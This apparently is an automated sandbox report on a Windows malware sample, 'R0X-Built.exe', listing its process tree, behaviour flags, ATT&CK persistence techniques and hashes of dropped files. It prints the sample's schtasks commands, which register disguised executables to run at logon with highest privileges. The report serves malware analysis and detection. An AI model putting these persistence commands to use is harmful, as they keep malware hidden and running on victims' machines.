C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-mstha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-mstha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Ybqw0YSdJfyJ.exe"C:\Users\Admin\AppData\Local\Temp\Ybqw0YSdJfyJ.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3556 -s 6325⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /delete /tn "$srr-mstha" /f4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gOcTlaZu4IHt.bat" "4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost5⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77$srr-powershell.exe" /tr "'C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe'" /sc onlogon /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /72⤵
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Checks SCSI registry key(s)
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 0a044a57ebb6e01a682239385b6d1d86 zIivLdsk30Kz6t7CgaZlIQ.0.1.0.0.01⤵
- Sets service image path in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
- Drops file in Windows directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Desktop\ExpandSearch.001"2⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\Desktop\ExpandSearch.0013⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2032 -parentBuildID 20240401114208 -prefsHandle 1960 -prefMapHandle 1952 -prefsLen 25457 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8a0e0034-3c7c-4fad-8c00-4f443725d543} 1880 "\\.\pipe\gecko-crash-server-pipe.1880" gpu4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2436 -prefMapHandle 2432 -prefsLen 26377 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aeed0b32-8d34-4c2f-b913-45fe43884dd7} 1880 "\\.\pipe\gecko-crash-server-pipe.1880" socket4⤵
- Checks processor information in registry
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3236 -childID 1 -isForBrowser -prefsHandle 3300 -prefMapHandle 3296 -prefsLen 26518 -prefMapSize 244658 -jsInitHandle 1108 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3aa0e4a-9ed4-4614-8a1a-457f5bcf44dd} 1880 "\\.\pipe\gecko-crash-server-pipe.1880" tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4140 -childID 2 -isForBrowser -prefsHandle 4132 -prefMapHandle 4128 -prefsLen 30867 -prefMapSize 244658 -jsInitHandle 1108 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3240b4d3-a609-4799-b680-dd18fcc107cf} 1880 "\\.\pipe\gecko-crash-server-pipe.1880" tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5040 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4964 -prefMapHandle 5032 -prefsLen 30998 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a5058b0-d93b-46da-add5-21c9fd92388c} 1880 "\\.\pipe\gecko-crash-server-pipe.1880" utility4⤵
- Checks processor information in registry
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5280 -childID 3 -isForBrowser -prefsHandle 5264 -prefMapHandle 5260 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1108 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {32f3485c-f0a8-427e-bd9c-2a9515e6636d} 1880 "\\.\pipe\gecko-crash-server-pipe.1880" tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5436 -childID 4 -isForBrowser -prefsHandle 5512 -prefMapHandle 5508 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1108 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e1f7f6a9-af4c-4ee8-8473-e424a3acae58} 1880 "\\.\pipe\gecko-crash-server-pipe.1880" tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5696 -childID 5 -isForBrowser -prefsHandle 5616 -prefMapHandle 5620 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1108 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {31bd7ece-2c4c-46d9-822c-07e729d91016} 1880 "\\.\pipe\gecko-crash-server-pipe.1880" tab4⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 3556 -ip 35562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7A7C.tmp.csvFilesize
41KB
MD51900ad6a735491199757c5b2b4c16dee
SHA18bb1bc0e9e381e3836b446f3965be1809723826e
SHA25670ae977b1bd33e44828163b38d12688851bfece2f1ce722d4564d787c4dcdf18
SHA512385c7d2cbc62625ee364d781ca65df498b7201198fb4f9757b41b45c479ae042f64dc07f30704209101be4475e635aabd477383ee4ffc44023075003e1e64ed0
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7A9C.tmp.txtFilesize
13KB
MD5a01b44ae0a95ede78bab27cb401b982d
SHA1a8586935db066f84f54d80b59acbb59c0349a132
SHA2562953376282ea6005509e4c072fa0d73b6e1a85a024bc3d337447a5a5e7e90af6
SHA512ce014e3f35d6588c6d8934a032eb8acf71601c8b5a3aba1ad4f1727e4d2613ebfd892f6d9adfe1ee40aee361ba0966868e40498d299867fab6813cdc81f77886
-
C:\ProgramData\USOPrivate\UpdateStore\store.dbFilesize
60KB
MD560b27a84faa2011bd412403cbda47a80
SHA163a1fcc2723f09f41b95011e67deb7aa428cfb74
SHA256310b03abc253105da71811f62d91e996dd715ceadc4ee90475cbfe0be39500fc
SHA512532149f20bb78e14978898f984afe3433f7e1f5742555d7e2a6bd0fb1ec5ed83ba274e70de5fcae2f07c5d7c93da62b03ba18ea2da540fcc5521b66a4c1805f2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.chkFilesize
8KB
MD58feb2eb5458e1c447eaa2df45b4f0ce1
SHA1ec0fff45b8421df5cdd39640bb2ed8281833555d
SHA256e5db7c9cc15c7f7e4981b4fb68c061395bb10d72bfeb9b2fb6ebaea903b07dc4
SHA512e146c6b46d6d224c36da218d210c23fbcbc40992543bdbc57cdd9092489e602dc0579ee64e1a00f1ca4f13616bf3ecac334b3c179508a97c36ebc0ac9948f7b1
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\l594d31n.default-release\activity-stream.discovery_stream.jsonFilesize
19KB
MD52f987aa1c9867ff0826c3d9e4bbfa9f6
SHA163e7b28aabf8cb547e95738bdc4a28040e4bf793
SHA256ed33a9a9aa691a987bce3bada302842c4ed64c9ca56edc0c82098cc1746baf48
SHA512e7c9a35f11ef96585f820c14ce9016af19d516471c1ed1e57d2a254516310da951cc66eeddd15868797482ae3e0a465610cd2d5f7e19565a0a197760feabd3b5
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749Filesize
330B
MD509955f7eb4015ad6132158fc767f3c0f
SHA18bf156602a76b462a7d42838d54302e9f74b09fa
SHA256cbda87ec65fbefe1c07586bc3d14c9b0b9e8d59d694c98189b3a8e18230efda2
SHA512aaf319dd2f2b0d971b6c5efdbdd46071fea13feb0dba916e869c979978918d442fb357c97fe99e2122895738d1422e19f0c1894c81c9f17f2c075d2c947aa7d5
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749Filesize
290B
MD517866386acde626f4822c56a070f21ce
SHA155cc712fb163da15fb859921f5a8a0a2eb3fcda6
SHA2563fd38b8d51f167f4607df736250bb337de6e6450b670678fa0669bb0e0e58683
SHA5121bc123176ac80f73925738a3126eae381ee785db2ace9fe743ef040f8591389f396e6368b2d6610de1e11f4f4689e1995a49b990d52f647fbabca93fe6f43e5c
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edb.chkFilesize
8KB
MD5759e5087e093f2b3288eb0c4d1532ec8
SHA18b8eac0b67a94b07a4bf927ee025c4116ed1be83
SHA2562bfaa9b502e977d87a0240d3358a83604912ceddd396a44c0bbfc92bcc1d67c2
SHA512aa756f1c19ebfe07886433ea769855f64d2c4d4063d41639f3cfb9367e70614bb0aba645ccf25d2914593fd7afb22870cb46c5af0a6952eaad477b26418347f2
-
C:\Users\Admin\AppData\Local\Temp\Ybqw0YSdJfyJ.exeFilesize
319KB
MD59bbe98633719fae2921f1093c64e427d
SHA105706af676a2cdc8123a6f8237da9de2e20c421d
SHA256c9d1e75ee5dba1664010fa7aee5f8728f01268eb81f58cbefce4311d8c715383
SHA51260d7734c598a2357d8e590fa9a4abf17223186b6fb4d0392f60c948150f9de99c63e2dbb5d32f8c4f5e5179025dcbddd037c8ccebc64a7d185315cff692fad42
-
C:\Users\Admin\AppData\Local\Temp\Ybqw0YSdJfyJ.exeFilesize
2.3MB
MD57d5ddb3fa14cbcbaccad6806043dee4f
SHA134a334257cf4f595cd7bcf2498b86792f0132333
SHA256df08b8b264862024e228bc64c267dc178d9a63430b97b93051fbcf685698141a
SHA512931ebbe387284ad4213f6b1be2a481ae60750657a9d7a76e5c74a5ffbca6a41c531c433f25a9156bff6c4fc5a7b436013c9cdda2084551a8dcee4cb4c9db0867
-
C:\Users\Admin\AppData\Local\Temp\gOcTlaZu4IHt.batFilesize
272B
MD51cf15a9459539fdae38b931384f0604b
SHA178f242bccfc7086919a88ebd674910b06d772685
SHA2566633a21258c432600a25cd582037bc0cb802d2ab96d7b07ca1bf61c67d269655
SHA512f24fde491d43e52f8b3045a7c1134e5476b8510d45a5352c351ffca95f4950092082059ad9e5063cfb8626aeb2da40283f370f64acbf60d810cd8c3fa5c5fd66
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\Logs\05-04-~1Filesize
336B
MD55fd785ebb64f22321ed43c3242487494
SHA13bf2cd3eed2a87d50d3875834ea4ffcaa0edf5ff
SHA256c33e14b55d0b4d352717274c34ed885eb9df8231c454418a4b2f0d43f4a63503
SHA512d3f25778ef52593224b19017cf086380f438341e9aa2206a0f33947f0c79b8aee6429acf44584c95a1f7e632f4ec99549dc15977fab360c886882c0808cfd962
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\l594d31n.default-release\datareporting\glean\db\data.safe.tmpFilesize
5KB
MD558ec7dc9e24a13f3d5a47d026656877d
SHA12262d86d71fd76eec15b87a075392d5ceea8481c
SHA2564dac444ca2619b6270bdf3ecb4353c42ab5cd684694ab9b76bfe4293126b4c65
SHA51211298df8a5d07d180db3393b16e2b1997025020ed529a83dfaeb9e9a0a4302c06e3dbb668b4079c83a7d817d838e583472e512f517e68bc5d92b232cad2145cd
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\l594d31n.default-release\datareporting\glean\db\data.safe.tmpFilesize
6KB
MD545eb588ee3211217ecd58b677c51ba56
SHA1ffd64990b3529554d8d4792b39def1ab9bb455b3
SHA256b8d700ab8b983b2f7eef1acb55460e5eff177934013c457abaa489865919c644
SHA51288d8a77ab137dab08d4eb3f9a1aa3062398a05a7ae81c318e154b269aa394e138e9835e179622939175d54a0cb8eaaea83ab49615d37215e4f9371a5cc01a2e7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\l594d31n.default-release\datareporting\glean\db\data.safe.tmpFilesize
6KB
MD5adc6a21576c69a348d39228024f8c9bb
SHA1d7718d8909c5d2fe01b99c96c8d770cd2d055596
SHA256160789abc5ddb83a687af59db6b2b0456e7d2861cfb15df9efec44a022b4d72e
SHA5122f133a3dd3ea703296932fc133d759f3e578ba082487403b868f41f29a33ec655c17fbf42e8d5625ebc60b7bc5cd6ceabf0b970f7fa1b5084516b7f0b0ba6ad6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\l594d31n.default-release\datareporting\glean\pending_pings\7c07c7a2-7733-49be-8795-93a4b43ad9d6Filesize
671B
MD5b5cb8d5669af7fbfe80360b3905b28be
SHA1d5f0658de0dbbeefc19e51479c763ef74519e760
SHA256e2d08b7947dc3fb890913c99d8e8f5adc9dc01441cad136dfee42789cb7b2801
SHA512502652207958508721011d9bc53b7b9000ee99e69eae38efdf8fce2cb66701bcf3c57eaacaa3874eb3f09ee5eae0f45bce8fe351ff618003b553ffdc6c19dd85
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\l594d31n.default-release\datareporting\glean\pending_pings\8aeb1926-0b17-4996-b594-5f2053113f04Filesize
28KB
MD58f430c9a8c38a2a65c7c037f063b8082
SHA162249cbe1ede16f44e4ba627b90cce4100c3be7e
SHA2566f8dac8966095f14a7e89e2c0925d5a6462c094778cda47c64e14c7f5caea71e
SHA5129b69770ffd80fbb64e104608fb3105b84b6549e810a8026f313f7290a70d76f1ebb9c6fba9270f7459129ae00bd6c10cb326bc2802974d875df0cac89b77166d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\l594d31n.default-release\datareporting\glean\pending_pings\8cbe5dc8-1432-465e-aa4c-ca7bf022f277Filesize
982B
MD5b61c9cd56bc03e3c7a036ed31e9e082f
SHA1493f4b7175a4fd2ab435a52ba320b0d72662b3d9
SHA256ff2a3f1844cd0926aa4b6f01c021dc4d46db7399656cfe83ece3dfaf6a062416
SHA512b8a6ffcd6430566383c5bfd559738d6afa965857b84cdcb052e0f17d5d19653b49d4b39b865d0a5d2c56b0ef7645c5d767e38809f8f28c35d396c9ea24e6f3b4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\l594d31n.default-release\prefs-1.jsFilesize
8KB
MD5de6553ed630899f044c4164fb1791dd2
SHA1c647b4ccd3d525b7a6de52ec7bdd4b169bc47f11
SHA2563d4a629bfb057ee402d9cfeb18fdd9493204fcf71139754a9f0c4a6e75e41afc
SHA51299d807f508461b9ef1f4754a7e20dd221d782a8a782292f39402b6c065cbc1c3574c125c4145924f0da8fb1c5d26b4fd9acc6efdddc05fb9a114ff3f57264a1e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\l594d31n.default-release\prefs.jsFilesize
8KB
MD5287822372bea6fa0b251b5fe99ff2858
SHA18cef02cd3f0e5a1f7edd3a3f8b6a19041b3f7ef1
SHA25605f5f169840053e0bd83b37cc1839c55442ebf75316525918440dcb10486a3fe
SHA5121105a8f64ad212bb299be8178f861151fd165321b660d3ccf31b5a0c079173aa7619fc433cf4667f81a43af2e8c6fb3211bc5840c093ddfa31359a9a660d0e7d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\l594d31n.default-release\sessionCheckpoints.jsonFilesize
259B
MD5e6c20f53d6714067f2b49d0e9ba8030e
SHA1f516dc1084cdd8302b3e7f7167b905e603b6f04f
SHA25650a670fb78ff2712aae2c16d9499e01c15fddf24e229330d02a69b0527a38092
SHA512462415b8295c1cdcac0a7cb16bb8a027ef36ae2ce0b061071074ac3209332a7eae71de843af4b96bbbd6158ca8fd5c18147bf9a79b8a7768a9a35edce8b784bf
-
C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exeFilesize
409KB
MD5baed4bf822391e30e4dbe2ae0ea3fcfe
SHA1d978134771b65bace600644691b4d30c893920e8
SHA2565ded8a15f37933b10dc5f2daea6c7ebbee3017da22d53f875acfa5882a318b6d
SHA512b428424cfe003421a7c0a5d21a06709e80ee35d8c0f0501be19d8250fad27c72fcd98b9290510de0dc1147915751383a2908f075592eb4f2b8258e090cf2c452
-
C:\Users\Admin\Downloads\OdQ2smx4.001.partFilesize
1.0MB
MD58510850c614af92bcbb5613f899ca7ed
SHA1c5fbafdf835201b6638df9da4b3aa581ebe92bed
SHA2563871fa03b905f3c70f16950d319852b41d51f8a5db10f9107a29814059a03c45
SHA512b762bcb50ffd2b056b5f70ad1a53ba77e0ac7b2b0dee05f57d55baf36049b7ca74238c3568d11e1505efcebadd7f2e5c98381d48d302f75e726f52dc375ecc9d
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
